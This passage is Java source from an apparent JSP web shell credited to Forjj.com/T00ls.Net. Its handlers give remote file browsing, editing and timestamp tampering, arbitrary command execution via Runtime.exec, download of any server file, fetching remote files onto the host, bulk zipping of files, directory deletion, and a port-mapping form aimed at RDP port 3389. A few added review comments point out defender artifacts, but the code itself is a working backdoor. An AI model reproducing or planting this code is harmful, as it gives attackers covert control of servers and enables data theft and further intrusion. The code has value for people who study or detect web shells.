= request.getParameter("folder"); 1010 | if (Util.isEmpty(path)) 1011 | path = JSession.getAttribute(CURRENT_DIR).toString(); 1012 | 1013 | JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); 1014 | File file = new File(path); 1015 | if (!file.exists()) { 1016 | throw new Exception(path+"Dont Exists !"); 1017 | } 1018 | JSession.setAttribute(CURRENT_DIR,path); 1019 | File[] list = file.listFiles(); 1020 | Arrays.sort(list,new MyComparator()); 1021 | out.println("
"); 1022 | String cr = null; 1023 | try { 1024 | cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); 1025 | }catch(Exception e) { 1026 | cr = "/"; 1027 | } 1028 | File currentRoot = new File(cr); 1029 | out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

"); 1030 | out.println("
"+ 1031 | ""+ 1032 | " "+ 1033 | " "+ 1034 | " "+ 1035 | " "+ 1036 | " "+ 1037 | "
Current Directory
"+ 1038 | "
"); 1039 | out.println(""+ 1040 | ""+ 1055 | ""+ 1056 | ""+ 1057 | " "+ 1058 | " "+ 1059 | " "+ 1060 | " "+ 1061 | " "+ 1062 | ""); 1063 | if (file.getParent() != null) { 1064 | out.println(""+ 1065 | ""+ 1066 | ""+ 1067 | ""); 1068 | } 1069 | int dircount = 0; 1070 | int filecount = 0; 1071 | for (File f:list) { 1072 | if (f.isDirectory()) { 1073 | dircount ++; 1074 | out.println(""+ 1075 | ""+ 1076 | ""+ 1077 | ""+ 1078 | ""+ 1079 | ""+ 1080 | ""+ 1081 | ""); 1082 | } else { 1083 | filecount++; 1084 | out.println(""+ 1085 | ""+ 1086 | ""+ 1087 | ""+ 1088 | ""+ 1089 | ""+ 1091 | ""+ 1105 | ""); 1106 | } 1107 | } 1108 | out.println(""+ 1109 | " "+ 1110 | " "+ 1111 | "
"+ 1041 | "
"+ 1042 | "Web Root"+ 1043 | " | Shell Directory"+ 1044 | " | New Directory | New File"+ 1045 | " | "); 1046 | File[] roots = file.listRoots(); 1047 | for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); 1050 | if (i != roots.length -1) { 1051 | out.println("|"); 1052 | } 1053 | } 1054 | out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ 1090 | ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ 1092 | "Edit | "+ 1093 | "Down | "+ 1094 | "Copy | "+ 1095 | "Move | "+ 1096 | "Property"); 1097 | if (f.getName().endsWith(".zip")) { 1098 | out.println(" | UnPack"); 1099 | } else if (f.getName().endsWith(".rar")) { 1100 | out.println(" | UnPack"); 1101 | } else { 1102 | out.println(" | Pack"); 1103 | } 1104 | out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
"); 1112 | out.println("
"); 1113 | } catch (Exception e) { 1114 | e.printStackTrace(); 1115 | throw e; 1116 | } 1117 | } 1118 | } 1119 | private static class LogoutInvoker extends DefaultInvoker { 1120 | public boolean doBefore() {return false;} 1121 | public boolean doAfter() {return false;} 1122 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1123 | try { 1124 | Object dbo = JSession.getAttribute(DBO); 1125 | if (dbo != null) 1126 | ((DBOperator)dbo).close(); 1127 | Object obj = JSession.getAttribute(PORT_MAP); 1128 | if (obj != null) { 1129 | ServerSocket s = (ServerSocket)obj; 1130 | s.close(); 1131 | } 1132 | Object online = JSession.getAttribute(SHELL_ONLINE); 1133 | if (online != null) 1134 | ((OnLineProcess)online).stop(); 1135 | JSession.invalidate(); 1136 | response.sendRedirect(SHELL_NAME+"?o=vLogin"); 1137 | } catch (Exception e) { 1138 | e.printStackTrace(); 1139 | throw e ; 1140 | } 1141 | } 1142 | } 1143 | private static class UploadInvoker extends DefaultInvoker { 1144 | public boolean doBefore() {return false;} 1145 | public boolean doAfter() {return false;} 1146 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1147 | try { 1148 | UploadBean fileBean = new UploadBean(); 1149 | response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); 1150 | fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); 1151 | fileBean.parseRequest(request); 1152 | JSession.setAttribute(MSG,"Upload File Success!"); 1153 | response.sendRedirect(SHELL_NAME+"?o=index"); 1154 | } catch (Exception e) { 1155 | e.printStackTrace(); 1156 | throw e ; 1157 | } 1158 | } 1159 | } 1160 | private static class CopyInvoker extends DefaultInvoker { 1161 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1162 | try { 1163 | String src = request.getParameter("src"); 1164 | String to = 
request.getParameter("to"); 1165 | BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); 1166 | BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); 1167 | byte[] d = new byte[1024]; 1168 | int len = input.read(d); 1169 | while(len != -1) { 1170 | output.write(d,0,len); 1171 | len = input.read(d); 1172 | } 1173 | output.close(); 1174 | input.close(); 1175 | JSession.setAttribute(MSG,"Copy File Success!"); 1176 | response.sendRedirect(SHELL_NAME+"?o=index"); 1177 | } catch (Exception e) { 1178 | e.printStackTrace(); 1179 | throw e ; 1180 | } 1181 | } 1182 | } 1183 | private static class BottomInvoker extends DefaultInvoker { 1184 | public boolean doBefore() {return false;} 1185 | public boolean doAfter() {return false;} 1186 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1187 | try { 1188 | response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ 1189 | "
"); 1190 | } catch (Exception e) { 1191 | e.printStackTrace(); 1192 | throw e ; 1193 | } 1194 | } 1195 | } 1196 | private static class VCreateFileInvoker extends DefaultInvoker { 1197 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1198 | try { 1199 | PrintWriter out = response.getWriter(); 1200 | String path = request.getParameter("filepath"); 1201 | File f = new File(path); 1202 | if (!f.isAbsolute()) { 1203 | String oldPath = path; 1204 | path = JSession.getAttribute(CURRENT_DIR).toString(); 1205 | if (!path.endsWith("/")) 1206 | path+="/"; 1207 | path+=oldPath; 1208 | f = new File(path); 1209 | f.createNewFile(); 1210 | } else { 1211 | f.createNewFile(); 1212 | } 1213 | out.println("
"+ 1214 | "
"+ 1215 | "

Create / Edit File »

"+ 1216 | ""+ 1217 | "

Current File (import new file name and new file)

"+ 1218 | "

File Content

"+ 1219 | "

"+ 1220 | "
"+ 1221 | "
"); 1222 | } catch (Exception e) { 1223 | e.printStackTrace(); 1224 | throw e ; 1225 | } 1226 | } 1227 | } 1228 | private static class VEditInvoker extends DefaultInvoker { 1229 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1230 | try { 1231 | PrintWriter out = response.getWriter(); 1232 | String path = request.getParameter("filepath"); 1233 | File f = new File(path); 1234 | if (f.exists()) { 1235 | BufferedReader reader = new BufferedReader(new FileReader(f)); 1236 | StringBuilder content = new StringBuilder(); 1237 | String s = reader.readLine(); 1238 | while (s != null) { 1239 | content.append(s+"\r\n"); 1240 | s = reader.readLine(); 1241 | } 1242 | reader.close(); 1243 | out.println("
"+ 1244 | "
"+ 1245 | "

Create / Edit File »

"+ 1246 | ""+ 1247 | "

Current File (import new file name and new file)

"+ 1248 | "

File Content

"+ 1249 | "

"+ 1250 | "
"+ 1251 | "
"); 1252 | } 1253 | } catch (Exception e) { 1254 | e.printStackTrace(); 1255 | throw e ; 1256 | } 1257 | } 1258 | } 1259 | private static class CreateFileInvoker extends DefaultInvoker { 1260 | public boolean doBefore(){return false;} 1261 | public boolean doAfter(){return false;} 1262 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1263 | try { 1264 | PrintWriter out = response.getWriter(); 1265 | String path = request.getParameter("filepath"); 1266 | String content = request.getParameter("filecontent"); 1267 | 1268 | BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); 1269 | outs.write(content,0,content.length()); 1270 | outs.close(); 1271 | JSession.setAttribute(MSG,"Save File Success!"); 1272 | response.sendRedirect(SHELL_NAME+"?o=index"); 1273 | } catch (Exception e) { 1274 | e.printStackTrace(); 1275 | throw e ; 1276 | } 1277 | } 1278 | } 1279 | private static class VEditPropertyInvoker extends DefaultInvoker { 1280 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1281 | try { 1282 | PrintWriter out = response.getWriter(); 1283 | String filepath = request.getParameter("filepath"); 1284 | File f = new File(filepath); 1285 | if (!f.exists()) 1286 | return; 1287 | String read = f.canRead() ? "checked=\"checked\"" : ""; 1288 | String write = f.canWrite() ? "checked=\"checked\"" : ""; 1289 | String execute = f.canExecute() ? "checked=\"checked\"" : ""; 1290 | Calendar cal = Calendar.getInstance(); 1291 | cal.setTimeInMillis(f.lastModified()); 1292 | 1293 | out.println("
"+ 1294 | "
"+ 1295 | "

Set File Property »

"+ 1296 | "

Current file (fullpath)

"+ 1297 | " "+ 1298 | "

Read: "+ 1299 | " "+ 1300 | " Write: "+ 1301 | " "+ 1302 | " Execute: "+ 1303 | " "+ 1304 | "

"+ 1305 | "

Instead »"+ 1306 | "year:"+ 1307 | ""+ 1308 | "month:"+ 1309 | ""+ 1310 | "day:"+ 1311 | ""+ 1312 | ""+ 1313 | "hour:"+ 1314 | ""+ 1315 | "minute:"+ 1316 | ""+ 1317 | "second:"+ 1318 | ""+ 1319 | "

"+ 1320 | "

"+ 1321 | "
"+ 1322 | "
"); 1323 | } catch (Exception e) { 1324 | e.printStackTrace(); 1325 | throw e ; 1326 | } 1327 | } 1328 | } 1329 | private static class EditPropertyInvoker extends DefaultInvoker { 1330 | public boolean doBefore(){return false;} 1331 | public boolean doAfter(){return false;} 1332 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1333 | try { 1334 | String f = request.getParameter("file"); 1335 | File file = new File(f); 1336 | if (!file.exists()) 1337 | return; 1338 | String read = request.getParameter("read"); 1339 | String write = request.getParameter("write"); 1340 | String execute = request.getParameter("execute"); 1341 | String year = request.getParameter("year"); 1342 | String month = request.getParameter("month"); 1343 | String date = request.getParameter("date"); 1344 | String hour = request.getParameter("hour"); 1345 | String minute = request.getParameter("minute"); 1346 | String second = request.getParameter("second"); 1347 | if (Util.isEmpty(read)) { 1348 | file.setReadable(false); 1349 | } else { 1350 | file.setReadable(true); 1351 | } 1352 | if (Util.isEmpty(write)) { 1353 | file.setWritable(false); 1354 | } else { 1355 | file.setWritable(true); 1356 | } 1357 | if (Util.isEmpty(execute)) { 1358 | file.setExecutable(false); 1359 | } else { 1360 | file.setExecutable(true); 1361 | } 1362 | Calendar cal = Calendar.getInstance(); 1363 | cal.set(Calendar.YEAR,Integer.parseInt(year)); 1364 | cal.set(Calendar.MONTH,Integer.parseInt(month)-1); 1365 | cal.set(Calendar.DATE,Integer.parseInt(date)); 1366 | cal.set(Calendar.HOUR,Integer.parseInt(hour)); 1367 | cal.set(Calendar.MINUTE,Integer.parseInt(minute)); 1368 | cal.set(Calendar.SECOND,Integer.parseInt(second)); 1369 | if(file.setLastModified(cal.getTimeInMillis())){ 1370 | JSession.setAttribute(MSG,"Reset File Property Success!"); 1371 | } else { 1372 | JSession.setAttribute(MSG,"Reset File Property Failed!"); 1373 | } 1374 | 
response.sendRedirect(SHELL_NAME+"?o=index"); 1375 | } catch (Exception e) { 1376 | e.printStackTrace(); 1377 | throw e ; 1378 | } 1379 | } 1380 | } 1381 | //VShell 1382 | private static class VsInvoker extends DefaultInvoker{ 1383 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1384 | try { 1385 | PrintWriter out = response.getWriter(); 1386 | String cmd = request.getParameter("command"); 1387 | String program = request.getParameter("program"); 1388 | if (cmd == null) cmd = "cmd.exe /c set"; 1389 | if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; 1390 | if (JSession.getAttribute(MSG)!=null) { 1391 | Util.outMsg(out,JSession.getAttribute(MSG).toString()); 1392 | JSession.removeAttribute(MSG); 1393 | } 1394 | out.println(""+ 1414 | "
"+ 1395 | "
"+ 1396 | "

Execute Program »

"+ 1397 | "

"+ 1398 | ""+ 1399 | ""+ 1400 | "Parameter
"+ 1401 | ""+ 1402 | "

"+ 1403 | "
"+ 1404 | "
"+ 1405 | "

Execute Shell »

"+ 1406 | "

"+ 1407 | ""+ 1408 | ""+ 1409 | "Parameter
"+ 1410 | ""+ 1411 | "

"+ 1412 | "
"+ 1413 | "
"); 1415 | } catch (Exception e) { 1416 | e.printStackTrace(); 1417 | throw e ; 1418 | } 1419 | } 1420 | } 1421 | private static class ShellInvoker extends DefaultInvoker{ 1422 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1423 | try { 1424 | PrintWriter out = response.getWriter(); 1425 | String type = request.getParameter("type"); 1426 | if (type.equals("command")) { 1427 | ins.get("vs").invoke(request,response,JSession); 1428 | out.println("

"); 1429 | out.println("
");
// Command branch of ShellInvoker.invoke: the "command" request parameter is passed
// unmodified to Runtime.exec, so it runs with the privileges of the servlet
// container process.
1430 | String command = request.getParameter("command");
1431 | if (!Util.isEmpty(command)) {
// NOTE(review): host-side signal for defenders: the application server's JVM
// spawning a child process directly from a request handler.
1432 | Process pro = Runtime.getRuntime().exec(command);
// Only the child's standard output is read back; its error stream is not consumed
// in these lines, and the process is neither waited on nor destroyed here.
1433 | BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
1434 | String s = reader.readLine();
1435 | while (s != null) {
// Each output line goes through Util.getStr and Util.htmlEncode before it is
// written into the response page.
1436 | out.println(Util.htmlEncode(Util.getStr(s)));
1437 | s = reader.readLine();
1438 | }
1439 | reader.close();
1440 | out.println("
");
1441 | }
1442 | } else {
// Non-command branch of ShellInvoker: the "program" request parameter is executed
// without reading its output; only a status message is stored in the session.
1443 | String program = request.getParameter("program");
1444 | if (!Util.isEmpty(program)) {
1445 | Process pro = Runtime.getRuntime().exec(program);
1446 | JSession.setAttribute(MSG,"Program Has Run Success!");
1447 | ins.get("vs").invoke(request,response,JSession);
1448 | }
1449 | }
1450 | } catch (Exception e) {
1451 | e.printStackTrace();
1452 | throw e ;
1453 | }
1454 | }
1455 | }
// DownInvoker: streams the file named by the "path" request parameter back to the
// client as an attachment. The path is used exactly as supplied (new File(path));
// no directory restriction is applied in this class, so any file readable by the
// servlet container's account can be returned.
// NOTE(review): for incident triage, requests that select this handler ("down" in
// the handler map) with a path value identify files that may have left the host;
// the value is only in access logs if it was sent in the query string.
1456 | private static class DownInvoker extends DefaultInvoker{
// Both hooks return false, so the dispatcher skips the page header and footer
// handlers and the response carries only the file bytes.
1457 | public boolean doBefore(){return false;}
1458 | public boolean doAfter(){return false;}
1459 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1460 | try {
1461 | String path = request.getParameter("path");
1462 | if (Util.isEmpty(path))
1463 | return;
1464 | File f = new File(path);
1465 | if (!f.exists())
1466 | return;
// The download name is the file's base name, URL-encoded with PAGE_CHARSET.
1467 | response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET));
1468 | BufferedInputStream input = new BufferedInputStream(new FileInputStream(f));
1469 | BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
// Copy loop in 1024-byte chunks; the streams are closed only on the success path.
1470 | byte[] data = new byte[1024];
1471 | int len = input.read(data);
1472 | while (len != -1) {
1473 | output.write(data,0,len);
1474 | len = input.read(data);
1475 | }
1476 | input.close();
1477 | output.close();
1478 | } catch (Exception e) {
1479 | e.printStackTrace();
1480 | throw e ;
1481 | }
1482 | }
1483 | }
1484 | //VDown
1485 | private static class VdInvoker extends DefaultInvoker {
1486 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1487 | try {
1488 | PrintWriter out = response.getWriter();
1489 | String savepath = request.getParameter("savepath");
1490 | String url = request.getParameter("url");
1491 | if (Util.isEmpty(url))
1492 | url = "http://www.forjj.com/";
1493 | if (Util.isEmpty(savepath)) {
1494 | savepath = 
JSession.getAttribute(CURRENT_DIR).toString(); 1495 | } 1496 | if (!Util.isEmpty(JSession.getAttribute("done"))) { 1497 | Util.outMsg(out,"Download Remote File Success!"); 1498 | JSession.removeAttribute("done"); 1499 | } 1500 | out.println("
"+ 1501 | "
"+ 1502 | "

Remote File DownLoad »

"+ 1503 | "

"+ 1504 | ""+ 1505 | "Remote File URL:"+ 1506 | " "+ 1507 | "Save Path:"+ 1508 | ""+ 1509 | ""+ 1510 | "

"+ 1511 | "
");
1512 | } catch (Exception e) {
1513 | e.printStackTrace();
1514 | throw e ;
1515 | }
1516 | }
1517 | }
// DownRemoteInvoker: makes the server fetch the URL given in the "url" request
// parameter and writes the response body to the file path given in "savepath".
// Neither value is checked beyond being non-empty.
// NOTE(review): defender view: this handler stages additional files on the host.
// The artifacts are an outbound request originating from the application server
// and a new or overwritten file owned by the servlet container's account.
1518 | private static class DownRemoteInvoker extends DefaultInvoker {
1519 | public boolean doBefore(){return true;}
1520 | public boolean doAfter(){return true;}
1521 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1522 | try {
1523 | String downFileUrl = request.getParameter("url");
1524 | String savePath = request.getParameter("savepath");
1525 | if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
1526 | return;
1527 | URL downUrl = new URL(downFileUrl);
1528 | URLConnection conn = downUrl.openConnection();
1529 | BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
// FileOutputStream is opened without the append flag, so an existing file at
// savePath is truncated and replaced.
1530 | BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath)));
1531 | byte[] data = new byte[1024];
1532 | int len = in.read(data);
1533 | while (len != -1) {
1534 | out.write(data,0,len);
1535 | len = in.read(data);
1536 | }
1537 | in.close();
1538 | out.close();
// The "done" session flag is read by the "vd" handler, which is invoked next to
// render the download form again.
1539 | JSession.setAttribute("done","d");
1540 | ins.get("vd").invoke(request,response,JSession);
1541 | } catch (Exception e) {
1542 | e.printStackTrace();
1543 | throw e ;
1544 | }
1545 | }
1546 | }
// IndexInvoker: delegates to the handler registered under "filelist".
1547 | private static class IndexInvoker extends DefaultInvoker {
1548 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1549 | try {
1550 | ins.get("filelist").invoke(request,response,JSession);
1551 | } catch (Exception e) {
1552 | e.printStackTrace();
1553 | throw e ;
1554 | }
1555 | }
1556 | }
1557 | private static class MkDirInvoker extends DefaultInvoker {
1558 | public boolean doBefore(){return false;}
1559 | public boolean doAfter(){return false;}
1560 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1561 | try {
1562 | String name = request.getParameter("name"); 
1563 | File f = new File(name); 1564 | if (!f.isAbsolute()) { 1565 | String path = JSession.getAttribute(CURRENT_DIR).toString(); 1566 | if (!path.endsWith("/")) 1567 | path += "/"; 1568 | path += name; 1569 | f = new File(path); 1570 | } 1571 | f.mkdirs(); 1572 | JSession.setAttribute(MSG,"Make Directory Success!"); 1573 | response.sendRedirect(SHELL_NAME+"?o=index"); 1574 | } catch (Exception e) { 1575 | e.printStackTrace(); 1576 | throw e ; 1577 | } 1578 | } 1579 | } 1580 | private static class MoveInvoker extends DefaultInvoker { 1581 | public boolean doBefore(){return false;} 1582 | public boolean doAfter(){return false;} 1583 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1584 | try { 1585 | PrintWriter out = response.getWriter(); 1586 | String src = request.getParameter("src"); 1587 | String target = request.getParameter("to"); 1588 | if (!Util.isEmpty(target) && !Util.isEmpty(src)) { 1589 | File file = new File(src); 1590 | if(file.renameTo(new File(target))) { 1591 | JSession.setAttribute(MSG,"Move File Success!"); 1592 | } else { 1593 | String msg = "Move File Failed!"; 1594 | if (file.isDirectory()) { 1595 | msg += "The Move Will Failed When The Directory Is Not Empty."; 1596 | } 1597 | JSession.setAttribute(MSG,msg); 1598 | } 1599 | response.sendRedirect(SHELL_NAME+"?o=index"); 1600 | } 1601 | } catch (Exception e) { 1602 | e.printStackTrace(); 1603 | throw e ; 1604 | } 1605 | } 1606 | } 1607 | private static class RemoteDirInvoker extends DefaultInvoker { 1608 | public boolean doBefore(){return false;} 1609 | public boolean doAfter(){return false;} 1610 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1611 | try { 1612 | String dir = request.getParameter("dir"); 1613 | File file = new File(dir); 1614 | if (file.exists()) { 1615 | deleteFile(file); 1616 | deleteDir(file); 1617 | } 1618 | 1619 | 
JSession.setAttribute(MSG,"Remove Directory Success!"); 1620 | response.sendRedirect(SHELL_NAME+"?o=index"); 1621 | } catch (Exception e) { 1622 | e.printStackTrace(); 1623 | throw e ; 1624 | } 1625 | } 1626 | public void deleteFile(File f) { 1627 | if (f.isFile()) { 1628 | f.delete(); 1629 | }else { 1630 | File[] list = f.listFiles(); 1631 | for (File ff:list) { 1632 | deleteFile(ff); 1633 | } 1634 | } 1635 | } 1636 | public void deleteDir(File f) { 1637 | File[] list = f.listFiles(); 1638 | if (list.length == 0) { 1639 | f.delete(); 1640 | } else { 1641 | for (File ff:list) { 1642 | deleteDir(ff); 1643 | } 1644 | deleteDir(f); 1645 | } 1646 | } 1647 | } 1648 | private static class PackBatchInvoker extends DefaultInvoker{ 1649 | public boolean doBefore(){return false;} 1650 | public boolean doAfter(){return false;} 1651 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1652 | try { 1653 | String files = request.getParameter("files"); 1654 | if (Util.isEmpty(files)) 1655 | return; 1656 | String saveFileName = request.getParameter("savefilename"); 1657 | File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); 1658 | if (saveF.exists()) { 1659 | JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); 1660 | response.sendRedirect(SHELL_NAME+"?o=index"); 1661 | return; 1662 | } 1663 | ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); 1664 | String[] arr = files.split(","); 1665 | for (String f:arr) { 1666 | File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); 1667 | ZipEntry entry = new ZipEntry(pF.getName()); 1668 | zout.putNextEntry(entry); 1669 | FileInputStream fInput = new FileInputStream(pF); 1670 | int len = 0; 1671 | byte[] buf = new byte[1024]; 1672 | while ((len = fInput.read(buf)) != -1) { 1673 | zout.write(buf, 0, len); 1674 | zout.flush(); 1675 | } 1676 | fInput.close(); 1677 | } 
1678 | zout.close(); 1679 | JSession.setAttribute(MSG,"Pack Files Success!"); 1680 | response.sendRedirect(SHELL_NAME+"?o=index"); 1681 | } catch (Exception e) { 1682 | e.printStackTrace(); 1683 | throw e; 1684 | } 1685 | } 1686 | } 1687 | private static class PackInvoker extends DefaultInvoker { 1688 | public boolean doBefore(){return false;} 1689 | public boolean doAfter(){return false;} 1690 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1691 | try { 1692 | String packedFile = request.getParameter("packedfile"); 1693 | if (Util.isEmpty(packedFile)) 1694 | return; 1695 | String saveFileName = request.getParameter("savefilename"); 1696 | File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); 1697 | if (saveF.exists()) { 1698 | JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); 1699 | response.sendRedirect(SHELL_NAME+"?o=index"); 1700 | return; 1701 | } 1702 | File pF = new File(packedFile); 1703 | ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); 1704 | String base = ""; 1705 | if (pF.isDirectory()) { 1706 | zipDir(pF,base,zout); 1707 | } else { 1708 | zipFile(pF,base,zout); 1709 | } 1710 | zout.close(); 1711 | JSession.setAttribute(MSG,"Pack File Success!"); 1712 | response.sendRedirect(SHELL_NAME+"?o=index"); 1713 | } catch (Exception e) { 1714 | e.printStackTrace(); 1715 | throw e; 1716 | } 1717 | } 1718 | public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { 1719 | if (f.isDirectory()) { 1720 | File[] arr = f.listFiles(); 1721 | for (File ff:arr) { 1722 | String tmpBase = base; 1723 | if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) 1724 | tmpBase += "/"; 1725 | zipDir(ff,tmpBase+f.getName(),zout); 1726 | } 1727 | } else { 1728 | String tmpBase = base; 1729 | if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) 1730 | tmpBase += "/"; 1731 | 
zipFile(f,tmpBase,zout); 1732 | } 1733 | } 1734 | public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ 1735 | ZipEntry entry = new ZipEntry(base+f.getName()); 1736 | zout.putNextEntry(entry); 1737 | FileInputStream fInput = new FileInputStream(f); 1738 | int len = 0; 1739 | byte[] buf = new byte[1024]; 1740 | while ((len = fInput.read(buf)) != -1) { 1741 | zout.write(buf, 0, len); 1742 | zout.flush(); 1743 | } 1744 | fInput.close(); 1745 | } 1746 | } 1747 | private static class UnPackInvoker extends DefaultInvoker { 1748 | public boolean doBefore(){return false;} 1749 | public boolean doAfter(){return false;} 1750 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1751 | try { 1752 | String savepath = request.getParameter("savepath"); 1753 | String zipfile = request.getParameter("zipfile"); 1754 | if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) 1755 | return; 1756 | File save = new File(savepath); 1757 | save.mkdirs(); 1758 | ZipFile file = new ZipFile(new File(zipfile)); 1759 | Enumeration e = file.entries(); 1760 | while (e.hasMoreElements()) { 1761 | ZipEntry en = (ZipEntry) e.nextElement(); 1762 | String entryPath = en.getName(); 1763 | int index = entryPath.lastIndexOf("/"); 1764 | if (index != -1) 1765 | entryPath = entryPath.substring(0,index); 1766 | File absEntryFile = new File(save,entryPath); 1767 | if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 1768 | absEntryFile.mkdirs(); 1769 | BufferedOutputStream output = null; 1770 | BufferedInputStream input = null; 1771 | try { 1772 | output = new BufferedOutputStream( 1773 | new FileOutputStream(new File(save,en.getName()))); 1774 | input = new BufferedInputStream( 1775 | file.getInputStream(en)); 1776 | byte[] b = new byte[1024]; 1777 | int len = input.read(b); 1778 | while (len != -1) { 1779 | output.write(b, 0, len); 1780 | len = input.read(b); 1781 | } 1782 | } catch 
(Exception ex) { 1783 | } finally { 1784 | try { 1785 | if (output != null) 1786 | output.close(); 1787 | if (input != null) 1788 | input.close(); 1789 | } catch (Exception ex1) { 1790 | } 1791 | } 1792 | } 1793 | file.close(); 1794 | JSession.setAttribute(MSG,"Unzip File Success!"); 1795 | response.sendRedirect(SHELL_NAME+"?o=index"); 1796 | } catch (Exception e) { 1797 | e.printStackTrace(); 1798 | throw e ; 1799 | } 1800 | } 1801 | } 1802 | //VMapPort 1803 | private static class VmpInvoker extends DefaultInvoker { 1804 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1805 | try { 1806 | PrintWriter out = response.getWriter(); 1807 | Object localIP = JSession.getAttribute("localIP"); 1808 | Object localPort = JSession.getAttribute("localPort"); 1809 | Object remoteIP = JSession.getAttribute("remoteIP"); 1810 | Object remotePort = JSession.getAttribute("remotePort"); 1811 | Object done = JSession.getAttribute("done"); 1812 | 1813 | JSession.removeAttribute("localIP"); 1814 | JSession.removeAttribute("localPort"); 1815 | JSession.removeAttribute("remoteIP"); 1816 | JSession.removeAttribute("remotePort"); 1817 | JSession.removeAttribute("done"); 1818 | 1819 | if (Util.isEmpty(localIP)) 1820 | localIP = InetAddress.getLocalHost().getHostAddress(); 1821 | if (Util.isEmpty(localPort)) 1822 | localPort = "3389"; 1823 | if (Util.isEmpty(remoteIP)) 1824 | remoteIP = "www.forjj.com"; 1825 | if (Util.isEmpty(remotePort)) 1826 | remotePort = "80"; 1827 | if (!Util.isEmpty(done)) 1828 | Util.outMsg(out,done.toString()); 1829 | 1830 | out.println("
"+ 1831 | ""+ 1832 | " "+ 1833 | " "+ 1834 | " "+ 1858 | ""+ 1859 | "

PortMap >>

"+ 1835 | "
"+ 1836 | " "+ 1837 | " "+ 1838 | " "+ 1839 | " "+ 1842 | " "+ 1844 | " "+ 1846 | " "+ 1848 | " "+ 1849 | " "+ 1850 | " "+ 1854 | " "+ 1855 | "
Local Ip :"+ 1840 | " "+ 1841 | " Local Port :"+ 1843 | " Remote Ip :"+ 1845 | " Remote Port :"+ 1847 | "

"+ 1851 | " "+ 1852 | " "+ 1853 | "
"+ 1856 | "
"+ 1857 | "
"+ 1860 | "
